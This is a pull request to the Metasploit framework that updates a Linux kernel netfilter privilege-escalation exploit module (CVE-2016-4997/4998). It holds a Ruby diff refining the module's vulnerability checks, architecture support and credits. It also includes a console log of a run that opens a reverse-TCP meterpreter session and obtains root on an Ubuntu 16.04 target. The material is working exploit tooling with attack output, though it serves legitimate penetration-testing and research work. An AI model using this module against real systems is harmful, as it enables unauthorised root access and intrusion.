### PR TITLE
Update netfilter_priv_esc_ipv4 exploit

### DIFF
--- a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb
+++ b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 
   include Msf::Post::File
+  include Msf::Post::Linux::Kernel
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -15,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Local
         'Name'           => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',
         'Description'    => %q{
           This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently
-          only works against Ubuntu 16.04 (not 16.04.1) with kernel
-          4.4.0-21-generic.
+          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.
+
           Several conditions have to be met for successful exploitation:
           Ubuntu:
           1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)
           2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile
-          Kernel 4.4.0-31-generic and newer are not vulnerable.
+          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.
 
           We write the ascii files and compile on target instead of locally since metasm bombs for not
           having cdefs.h (even if locally installed)
@@ -29,26 +30,35 @@ class MetasploitModule < Msf::Exploit::Local
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'h00die <mike@stcyrsecurity.com>',  # Module
-            'vnik'                         # Discovery
+            'h00die <mike@stcyrsecurity.com>', # Module
+            'vnik',        # Exploit
+            'Jesse Hertz', # Discovery
+            'Tim Newsham'  # Discovery
           ],
         'DisclosureDate' => 'Jun 03 2016',
         'Platform'       => [ 'linux'],
-        'Arch'           => [ ARCH_X86 ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        =>
           [
             [ 'Ubuntu', { } ]
             #[ 'Fedora', { } ]
           ],
-        'DefaultTarget'  => 0,
         'References'     =>
           [
-            [ 'EDB', '40049'],
-            [ 'CVE', '2016-4997'],
-            [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']
-          ]
-      ))
+            ['EDB', '40049'],
+            ['CVE', '2016-4997'],
+            ['CVE', '2016-4998'],
+            ['URL', 'https://www.openwall.com/lists/oss-security/2016/06/24/5'],
+            ['URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'],
+            ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91']
+          ],
+        'Notes'          =>
+          {
+            'Reliability' => [ UNRELIABLE_SESSION ],
+            'Stability'   => [ CRASH_OS_DOWN ],
+          },
+        'DefaultTarget'  => 0))
     register_options [
       OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),
       OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),
@@ -59,6 +69,10 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
   def check
     def iptables_loaded?()
       # user@ubuntu:~$ grep ip_tables /proc/modules
@@ -66,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
       # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
       vprint_status('Checking if ip_tables is loaded in kernel')
       if target.name == "Ubuntu"
-        iptables = read_file('/proc/modules')
+        iptables = read_file('/proc/modules').to_s
         if iptables.include?('ip_tables')
           vprint_good('ip_tables.ko is loaded')
         else
@@ -74,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Local
         end
         return iptables.include?('ip_tables')
       elsif target.name == "Fedora"
-        iptables = read_file('/proc/modules')
+        iptables = read_file('/proc/modules').to_s
         if iptables.include?('iptable_raw')
           vprint_good('iptable_raw is loaded')
         else
@@ -86,28 +100,38 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    def shemsham_installed?()
-      # we want this to be false.
-      vprint_status('Checking if shem or sham are installed')
-      shemsham = read_file('/proc/cpuinfo')
-      if shemsham.include?('shem')
-        print_error('shem installed, system not vulnerable.')
-      elsif shemsham.include?('sham')
-        print_error('sham installed, system not vulnerable.')
-      else
-        vprint_good('shem and sham not present.')
-      end
-      return (shemsham.include?('shem') or shemsham.include?('sham'))
-    end
+    return CheckCode::Safe unless iptables_loaded?
 
-    if iptables_loaded?() and not shemsham_installed?()
-      return CheckCode::Appears
-    else
+    if smep_enabled?
+      print_error('SMEP enabled, system not vulnerable.')
       return CheckCode::Safe
     end
+    vprint_good('SMEP is not enabled')
+
+    if smap_enabled?
+      print_error('SMAP enabled, system not vulnerable.')
+      return CheckCode::Safe
+    end
+    vprint_good('SMAP is not enabled')
+
+    unless userns_enabled?
+      vprint_error('Unprivileged user namespaces are not permitted')
+      return CheckCode::Safe
+    end
+    vprint_good('Unprivileged user namespaces are permitted')
+
+    CheckCode::Appears
   end
 
   def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
     # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
     def has_prereqs?()
       vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
@@ -160,9 +184,6 @@ class MetasploitModule < Msf::Exploit::Local
         vprint_status('Dropping pre-compiled exploit on system')
       end
     end
-    if check != CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
-    end
 
     desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
     env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
@@ -170,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Local
     payload_file = rand_text_alpha(8)
     payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
 
-    # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
+    # direct copy of code from exploit-db, except removed the check for smep/smap and ip_tables.ko since we can do that in the check area here
     # removed         #include <netinet/in.h> per busterb comment in PR 7326
     decr = %q{
       #define _GNU_SOURCE


### PR DESCRIPTION
Update `netfilter_priv_esc_ipv4` exploit module. Fix a bunch of bugs and inaccuracies.

---

* Update `Arch` from `ARCH_X86` to both `ARCH_X86` and `ARCH_X64`. The exploit supports X64 systems and X64 payloads. (Also, [X86 systems probably aren't vulnerable](https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html), but I haven't tested, so whatever.)
* Add `Reliability` and `Stability` notes.
* Promote `check != CheckCode::Appears` check to the start of the `exploit` method.
* Add a check to the `check` method to verify if unprivileged user namespaces are permitted. [User namepaces are required](https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html) for the vulnerability to be exploited, and thus required by the exploit due to use of `CLONE_NEWUSER`.
* Add a check to confirm that the `WritableDir` is in fact writable.
* Add `to_s` to `read_file` calls, as `read_file` can return `nil`.

* Fix attribution and references

vnik was credited with discovery. While vnik likely knew of this bug and had an exploit, he disclosed neither, and did not publish his exploit until [after the bug was public](https://twitter.com/vnik5287/status/748843859065483264). This exploit uses both CVE-2016-4997 (ref count) and CVE-2016-4998 (oob), which were both publicly disclosed by Jesse Hertz and Tim Newsham [[1](https://www.openwall.com/lists/oss-security/2016/06/24/5)][[2](https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html)], who were not credited. This PR addresses this inaccuracy and adds additional reference URLs.

* Fix SMEP/SMAP detection.

`shem` / `sham` are not things that exist. - https://github.com/rapid7/metasploit-framework/pull/9812#discussion_r179351238 

I presume that at some point the C code fell victim to overzealous spell check, replacing `smep` / `smap`.

Fortunately, this exploit does not attempt to bypass SMEP / SMAP. Exploitation will `oops`, but won't crash the system unless the system is configured with `oops=panic`.

I'm somewhat amazed that the exploit worked when it was tested (#7326). SMEP capable CPUs had been around for a few years by 2016. Likewise, SMAP was a couple of years old.

---

```
msf5 exploit(linux/local/netfilter_priv_esc_ipv4) > set session 1
session => 1
msf5 exploit(linux/local/netfilter_priv_esc_ipv4) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip_tables.ko is loaded
[+] SMEP is not enabled
[+] SMAP is not enabled
[+] Unprivileged user namespaces are permitted
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
[+] libc6-dev-i386 is installed
[+] gcc-multilib is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing desc executable to /tmp/c8mpwD9S.c
[*] Executing /tmp/c8mpwD9S, may take around 35s to finish.  Watching for /tmp/6vkdoaUz to be created.
[*] Waited 0s so far
[*] Waited 10s so far
[*] Waited 20s so far
[*] Waited 30s so far
[*] Waited 40s so far
[+] desc finished, env ready.
[*] Writing payload to /tmp/DqUNQBqa
[*] Writing pwn executable to /tmp/IkHXEf4p.c
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.206
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.206:36266) at 2019-12-14 18:07:36 -0500
[+] Deleted /tmp/c8mpwD9S.c
[+] Deleted /tmp/6vkdoaUz
[+] Deleted /tmp/DqUNQBqa
[+] Deleted /tmp/IkHXEf4p.c
[+] Deleted /tmp/IkHXEf4p

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.206
OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
